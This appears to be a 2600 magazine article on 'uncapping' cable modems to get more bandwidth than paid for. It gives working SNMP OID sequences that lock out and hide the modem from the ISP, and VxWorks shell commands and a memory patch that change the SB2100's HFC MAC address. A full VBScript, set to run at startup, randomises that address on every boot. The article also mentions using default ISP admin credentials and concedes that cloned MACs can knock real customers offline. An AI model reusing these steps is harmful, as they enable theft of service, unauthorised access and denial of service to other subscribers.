Uncapper's Paradise

by CronoS@OlympoS

In this article, I will try to show that all is not lost in the uncapping front.  If you have a shell-enabled (firmware) cable modem (e.g., SURFboard SB2100) or think you can get one (from eBay), read on.

If you want to change your modem to an IP/LLC filtering firewall, read on.  I will tell you how to add filters and change HFC MAC address automatically to a random MAC address and surf uncapped anonymously.

Disclaimer:  Use this knowledge to explore DOCSIS and VxWorks OS.  Do not use it for illegal purposes.

Background - A Brief History of Uncapping

I met with broadband services in 1999.  When I heard that some company was planning to offer these services, I quickly subscribed as a beta tester.  A few days later I started uncapping with the usual TFTP spoof method (although it was so fast during the test days and there was no need to uncap, I felt like finding its strong and weak points).

Then I accessed the router and learned "cable qos permission enforce" for increasing speed for a single modem or for all modems.  And also, the ISP's Cisco Network Registrar software with default user/pass (admin/changeme) was there to set better profiles for customers.

So when they found a way to stop (MD5.cm file) I found another way (removing MD5 with hexedit) to do it.  Then they replaced their uBR7200 with a 12000 router and the MD5 removal thing was history.  I sniffed the network and picked up configuration file names (512k.cm, etc.).

The fastest I found was a two megabitfile and it had an easily guessed name (2048.cm).  It was possible to feed these files to the modem with TFTP.  Then they thought if they changed the name to a stupid long filename with random characters that curious explorers wouldn't find them and use them.  Heh, thanks to the sniffers, it was easy to find out names and get them from the TFTP server.

So, I started using the two megabit file but they were resetting my modem again.  First, I thought (like others) that if I could block SNMP access then they wouldn't be resetting my modem.  So I quickly wrote a Perl script to change the SNMP community string and management IP address on the modem.

Here's what you need:

OID=1.3.6.1.3.83.1.2.1.7.1 Type=INTEGER Value=5 (create filter and wait)
OID=1.3.6.1.3.83.1.2.1.2.1 Type=IPADDRESS Value=x.x.x.x (mgmt Source IP address)
OID=1.3.6.1.3.83.1.2.1.3.1 Type=IPADDRESS Value =x.x.x.x (netmask)
OID=1.3.6.1.3.83.1.2.1.4.1 Type=OCTETSTRING Value= smtg (new community string  here)
OID=1.3.6.1.3.83.1.2.1.5.1 Type=INTEGER Value=3  (read write access)
OID=1.3.6.1.3.83.1.2.1.7.1 Type=INTEGER Value=1 (activate filter)

If you set these sequentially, then no one will be able to reach your modem by SNMP.  Victory again.

But after four weeks, I found my modem getting reset again.  Back to reading DOCSIS documents again.

One thing to note, it was always fun to explore this new technology and learn new things.  As I learned, BSP techies learned too, and they got better security skills.  So isn't this good for both?  Of course, the taste of fast speed was great (if you live in an animal-named country where the ISP commercial on TV says, "Look, the connection is still there, we're online for hours"  #!$%).

Next, I thought if I could block all communication between the modem and CMTS (router), then they would not know my modem was online.  This technique still works in some cities here.  Just read the how-tos at cisco.com and create IP/LLC filters with SNMP:

From: Any
To: Your modem's HFC IP address
Action: Block

IP Filtering Example

OID=1.3.6.1.3.83.1.6.3.0 Type=INTEGER Value=2  
(If an IP packet does not match this filter, then let it pass)

OID=1.3.6.1.3.83.1.6.4.1.2.1 Type=INTEGER Value=5 
(Create the IP filter table entry number "1," but don't activate it yet)

OID=1.3.6.1.3.83.1.6.4.1.3.1 Type=INTEGER Value=1 
(All IP packets matching filter number "1" will be discarded)

OID=1.3.6.1.3.83.1.6.4.1.4.1 Type=INTEGER Value=0 
(This filter will be applied to both interfaces)

OID=1.3.6.1.3.83.1.6.4.1.5.1 Type=INTEGER Value=3 
(This filter applies to inbound and outbound traffic)

OID=1.3.6.1.3.83.1.6.4.1.6.1 Type=INTEGER Value=2 
(This filter does not only apply to broadcast and multicast traffic)

OID=1.3.6.1.3.83.1.6.4.1.7.1 Type=IPADDRESS Value="0.0.0.0" 
(The source IP address for this filter - beginning IP - if range)

OID=1.3.6.1.3.83.1.6.4.1.8.1 Type=IPADDRESS Value="0.0.0.0" 
(The source IP address for this fi lter - end IP - if range)

OID=1.3.6.1.3.83.1.6.4.1.9.1 Type=IPADDRESS Value="cm HFC IP"   
(The destination IP address for this filter - low)

OID=1.3.6.1.3.83.1.6.4.1.10.1 Type=IPADDRESS Value= "cm HFC IP"   
(The destination IP address for this filter - high)

OID=1.3.6.1.3.83.1.6.4.1.11.1 Type=INTEGER Value=256
(This filter matches TCP packets)

OID=1.3.6.1.3.83.1.6.4.1.12.1 Type=INTEGER Value=0   
(Source port - low)

OID=1.3.6.1.3.83.1.6.4.1.13.1 Type=INTEGER Value=65535 
(Source port - high)

OID=1.3.6.1.3.83.1.6.4.1.14.1 Type=INTEGER Value=0 
(Destination port - low)

OID=1.3.6.1.3.83.1.6.4.1.15.1 Type=INTEGER Value=65535 
(Destination port - high)

OID=1.3.6.1.3.83.1.6.4.1.2.1 Type=INTEGER Value=1 
(Activate the IP filter)

LLC Filtering Example (ARP Filtering in this Example)

OID=1.3.6.1.3.83.1.6.1.0 Type=INTEGER Value=2  
(2 = drop matching, allow others - 1 = allow matching, drop others)

OID=1.3.6.1.3.83.1.6.2.1.2.1 Type=INTEGER Value=5   
(Create and wait)

OID=1.3.6.1.3.83.1.6.2.1.3.1 Type=INTEGER Value=0 
(Both interfaces)

OID=1.3.6.1.3.83.1.6.2.1.4.1 Type=INTEGER Value=1 
(Ethernet protocol)

OID=1.3.6.1.3.83.1.6.2.1.5.1 Type=INTEGER Value=2054 
(ARP traffic)

OID=1.3.6.1.3.83.1.6.2.1.2.1 Type=INTEGER Value=1 
(Activate filter)

I wrote a tool to add these rules to the modem easily, and will make it public soon.

Now

As I moved to a smaller town (where the cable company had less than 100 customers), my first try was quickly detected and resulted in a "shame on you" telephone conversation.

I tried some other modem I had, and they banned its MAC address and it never got online again (couldn't get IP for HFC MAC and with an IP like 0.0.0.0 it couldn't bind TFTP and other stuff).

Another modem, and it got banned too.  Well, now it's a challenge.  I should find a way.  I should have control over the modem as much as they do.  So I looked for a modem with shell-enabled firmware.  I found one (from eBay) and examined the underlying beautiful VxWorks OS.  After two days of hard work, I found several ways to change the MAC address of the modem.

The following techniques are for the SURFboard SB2100 modem with a shell-enabled firmware.

(SB2100-1.1.1-SCM-SHELL):

Check: 
	
http://192.168.100.1/mainhelp.html

to see if your modem has a shell-enabled firmware.

First, connect the modem's diagnostic port to your PC's serial port.  (I will not go into details, consult your hardware guru friends.)

Change your PC's IP to TFTP server's IP (I will give you a sample script to automate this later below).

Start-up your favorite terminal program (examples are for SecureCRT) and turn on the modem.  You will see something like:

SURFboard Cable Modem - Model SB2100
Cold boot @ 0xbfc00000 ...
Running dramTest (32 bit ) store/load basic test ... PASSED
   ..
VxWorks System Boot

If you see a "->" prompt after:

$$ MCNS STARTUP $$
Launching startup...

then you are ready to use the commands below:

-> ts tScMain 

(Suspends the start-up script [ts;taskSuspend].)
(You will not be able to catch tScMain task if not entered quickly - you need a script running terminal program like SecureCRT.)

-> sysHfcMacAddrSet__3Hfccccccc(0x00, 0xDE, 0xAD, 0xBE, 0xEF, 0x01)

-> routeAdd "TFTPserverIP", "192.168.100.1"

(With the help of this, you won't need to ping the modem for TFTP feed.)

-> trtScMain

(Resume start-up script.)

-> td tShell 

(This is needed for later [privileged] shell access - prevents CLI start-up, later, just hit CTRL+C and it will grant you a new [privileged] shell.)

After the modem gets the .cm file, you can revert your IP settings back to DHCP.

The first method I found was using the sysEnetMacAddrSet command.  This command is used to change the Ethernet interface's MAC address.  But:

-> l sysEnetMacAddrSet
..
0x800a6bac 34c6800a ori a2,a2,0x800a
..

-> m 0x800a6bae (enter)
-> 800a6bae: 800a - (type '8000' and hit Enter here - for HFC interface)
-> 800a6bb0: 2504 - (type '.' and hit Enter to quit modifying)

Now if we call sysEnetMacAddrSet(0x00,...) it will set HFC interface's MAC address instead of Ethernet!  I will not list all commands here.  All you need is:

-> lkup "keyword"

This lists the commands/functions including keyword - case sensitive (lkup "reset", lkup "snmp", lkup "SNMP")

With lkup you can find everything, and if you're familiar with assembly, just use:

-> l command/function

for further examination.

If you set the MAC address to an already existing MAC address, the modem will be online with the Class-of-Services set for that customer and will cause the other (real one) to reset itself. When the other (real one) gets online your modem will reset itself, and so on. This looping process may cause a Denial-of-Service attack and prevent the legitimate user from connecting to the net.

Automatic for the People

Examples are for SecureCRT and Windows 2000 or Windows XP.

Add the following to Startp (create a batch file and add to Startup folder or add to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)

C:\Program Files\SecureCrt\securecrt.exe /S sessionname /script C:\script.vbs

Copy the script below to: C:\script.vbs

# $language = "VBScript"
# $interface = "1.0"

Dim tavan,taban,rendim,kauntir
Dim sonuc
Dim tumsi

Sub setaddr
tumsi = "sysHfcMacAddrSet__3Hfccccccc(0x00"
do while kauntir<6
randomize
rendim = Int((tavan - taban + 1)*Rnd + taban)
sonuc= hex(rendim)
tumsi = tumsi + "," + "0x" + sonuc
kauntir = kauntir+1
loop
tumsi = tumsi + ")"
End Sub

Do while 1=1
crt.Screen.Synchronous = True
tavan = 255
taban = 17
kauntir = 1
setaddr()
crt.Screen.WaitForString "Version:"
Set shell = CreateObject("WScript.Shell")
shell.Run "netsh interface ip set address "Local Area Connection" static TFTPSERVERIPHERE 255.255.0.0 TFTPSERVERIPHERE 1"
crt.Screen.WaitForString "-> "
crt.Screen.Send "ts tScMain" & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send tumsi & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send "routeAdd "&Chr(34)&"TFTPSERVERIPHERE"&Chr(34)&", "&Chr(34)&"192.168.100.1"&Chr(34) & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send "tr tScMain" & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send "td tShell" & vbCr
crt.Screen.WaitForString "REGISTRATION SUCCESS"
shell.Run "netsh interface ip set address "Local Area Connection" source=dhcp"
crt.Screen.Synchronous = False
loop

Code: script.vbs

Return to $2600 Index